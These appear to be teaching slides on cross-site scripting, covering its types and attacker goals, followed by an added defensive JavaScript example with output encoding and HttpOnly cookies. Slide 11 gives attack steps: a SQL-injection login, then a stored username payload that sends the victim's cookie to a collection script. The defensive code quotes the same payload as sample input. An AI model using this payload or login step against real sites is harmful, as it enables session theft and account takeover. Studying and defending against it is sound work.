3. INTRODUCTION
Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications that enables
malicious attackers to inject client-side script into web pages viewed
by other users.
4. ATTACK SCENARIO
An attacker does not target a victim directly. Instead, an attacker would exploit a
vulnerability within a website or web application that the victim would visit,
essentially using the vulnerable website as a vehicle to deliver a malicious script to
the victim’s browser.
5. ATTACK INTENT
Hijacking Accounts
False advertising and inserting hostile content
Changing users' settings
Stealing other users' cookies
Redirecting to other websites
6. TYPES OF ATTACK
REFLECTED (NON-PERSISTENT)
STORED (PERSISTENT)
DOM BASED
7. REFLECTED (NON-PERSISTENT)
Reflected XSS involves the reflecting of a malicious script off of a web application,
onto a user’s browser. The script is embedded into a link, and is only activated once
that link is clicked on.
An attacker convinces a user to follow a malicious URL which injects code into the
resulting page.
Now the attacker has full access to that page's content.
8. STORED XSS
Stored XSS, also known as persistent XSS, is the more damaging of
the two. It occurs when a malicious script is injected directly into a
vulnerable web application.
An attack can affect a large number of users, and the application can
also be infected by an XSS virus or worm.
9. DOM XSS
Document Object Model
Standard object model for representing HTML or XHTML
Problem exists within the page's client-side script
If an attacker hosts a malicious site that contains a vulnerable
website on a client's local system, a script can be injected.
Now the attacker can run with the privileges of that user's browser on
their system.
11. Steps for XSS Attack
Step 1 – Open techpanda.org
Step 2 – Log in using SQL injection (or a known
username and password)
Step 3 – Open Add New Account
Step 4 – Use the script below as the username
<a href=#
onclick="document.location='http://techpanda.org/snatch_sess_id.php?c='+escape
(document.cookie);">Dark</a>
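The defensive counterpart to the steps above, as an added example that is not part of the original slides: the stored username is HTML-encoded when it is rendered, and the session cookie is issued with HttpOnly so that document.cookie cannot read it. The function names, the table-cell markup and the cookie name session_id are assumptions made for illustration.

```javascript
// Added example (not from the original slides). All names are hypothetical.

// Constructed sample input: the username value submitted in Step 4.
const storedUsername =
  "<a href=# onclick=\"document.location='http://techpanda.org/snatch_sess_id.php?c='" +
  "+escape(document.cookie);\">Dark</a>";

const HTML_ENTITIES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
};

// Encode a value for HTML element content or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Vulnerable rendering: the stored value is concatenated into markup as-is,
// so the browser parses it as a real <a> element with an onclick handler.
function renderRowUnsafe(username) {
  return "<td>" + username + "</td>";
}

// Hardened rendering: the value is encoded at output time and shows up as text.
function renderRowSafe(username) {
  return "<td>" + escapeHtml(username) + "</td>";
}

// Session cookie header. HttpOnly keeps the cookie out of document.cookie,
// Secure limits it to HTTPS, SameSite=Lax limits cross-site sending.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Count opening tags of a given name that would be parsed as elements.
function countTags(html, tag) {
  return (html.match(new RegExp("<" + tag + "\\b", "gi")) || []).length;
}

console.log("unsafe <a> elements:", countTags(renderRowUnsafe(storedUsername), "a"));
console.log("safe   <a> elements:", countTags(renderRowSafe(storedUsername), "a"));
console.log("Set-Cookie:", sessionCookieHeader("session_id", "abc 123"));
```

Encoding belongs at output time and must match the context; this encoder covers element content and quoted attributes, not script blocks or URLs.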